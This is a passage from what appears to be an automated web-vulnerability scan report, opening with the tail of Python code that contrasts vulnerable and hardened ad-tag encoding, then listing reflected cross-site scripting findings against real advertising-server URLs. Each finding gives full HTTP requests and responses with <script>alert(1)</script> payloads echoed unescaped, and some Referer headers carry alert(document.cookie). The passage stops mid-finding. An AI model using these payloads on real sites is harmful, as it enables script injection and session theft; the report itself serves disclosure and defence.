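    # The URL sits in a double-quoted attribute: escape '"', '&', '<', '>'.
    markup = f'<script src="{html.escape(src, quote=True)}"></script>'
    return "document.write(" + js_string(markup) + ");"


def recover_click_url(tag):
    """Peel the layers the way the browser and the partner's server do:
    JS string -> attribute value -> click= parameter. Returns None if any
    layer fails to parse, which is what a successful injection causes."""
    m = re.search(r'^document\.write\((".*")\);$', tag)
    if not m:
        return None
    markup = json.loads(m.group(1))          # JSON accepts '\/' for '/'
    m = re.search(r'src="([^"]*)"', markup)
    if not m:
        return None
    m = re.search(r";click=([^;]*)", html.unescape(m.group(1)))
    return unquote(m.group(1)) if m else None


def ends_script_block_early(tag):
    """True when the emitted text contains a literal '</script>' that the
    HTML tokeniser, not the JS engine, will act on."""
    return "</script>" in tag.lower()


if __name__ == "__main__":
    # Constructed target in the shape of the 2.616 request.
    target = ('/hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT'
              '/pageid=995784169955?4c7c1"><script>alert(1)</script>85b8afcd626=1')
    print(vulnerable_tag(target))
    print(hardened_tag(target))
    print(recover_click_url(hardened_tag(target)))
```

The order of encoding matters and is the reverse of the nesting: encode for the innermost context first (the click URL), then for the URL that carries it, then for the attribute, then for the JS string. Decoding happens in the opposite order, once per layer, so a value that was encoded once too few times is exactly the one that lands raw in a downstream system, which is what the partner's `click=` parameter receives in the report.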

2.617. http://media.sensis.com.au/hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa5c"><script>alert(1)</script>f790b9cd080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver1fa5c"><script>alert(1)</script>f790b9cd080/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:29 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 507
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e000000001fa5c"><script>alert(1)</script>f790b9cd080/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

2.618. http://media.sensis.com.au/hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff7c"><script>alert(1)</script>29794c8a740 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random2ff7c"><script>alert(1)</script>29794c8a740=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:31 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 507
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_random2ff7c"><script>alert(1)</script>29794c8a740=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146
...[SNIP]...

2.619. http://media.sensis.com.au/hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b29"><script>alert(1)</script>82e4153325d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?92b29"><script>alert(1)</script>82e4153325d=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:28 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 510
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?92b29"><script>alert(1)</script>82e4153325d=1" target="_new">
...[SNIP]...

2.620. http://media.sensis.com.au/hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e5eb"><script>alert(1)</script>5094304b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver2e5eb"><script>alert(1)</script>5094304b96d/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:30 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e000000002e5eb"><script>alert(1)</script>5094304b96d/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.621. http://media.sensis.com.au/hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a087b"><script>alert(1)</script>c4781fb498b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randoma087b"><script>alert(1)</script>c4781fb498b=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:31 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_randoma087b"><script>alert(1)</script>c4781fb498b=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.622. http://media.sensis.com.au/hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68e3"><script>alert(1)</script>68426bb789e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?b68e3"><script>alert(1)</script>68426bb789e=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:29 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 520
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?b68e3"><script>alert(1)</script>68426bb789e=1" target="_new">
...[SNIP]...

2.623. http://media.sensis.com.au/hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1f5"><script>alert(1)</script>ceca24be3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverfe1f5"><script>alert(1)</script>ceca24be3b3/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffcfe1f5"><script>alert(1)</script>ceca24be3b3/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.624. http://media.sensis.com.au/hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e425e"><script>alert(1)</script>8f9526a46d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randome425e"><script>alert(1)</script>8f9526a46d4=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:42 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_randome425e"><script>alert(1)</script>8f9526a46d4=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=7463117
...[SNIP]...

2.625. http://media.sensis.com.au/hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ac0"><script>alert(1)</script>4fe2990056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?83ac0"><script>alert(1)</script>4fe2990056=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:38 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 435
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

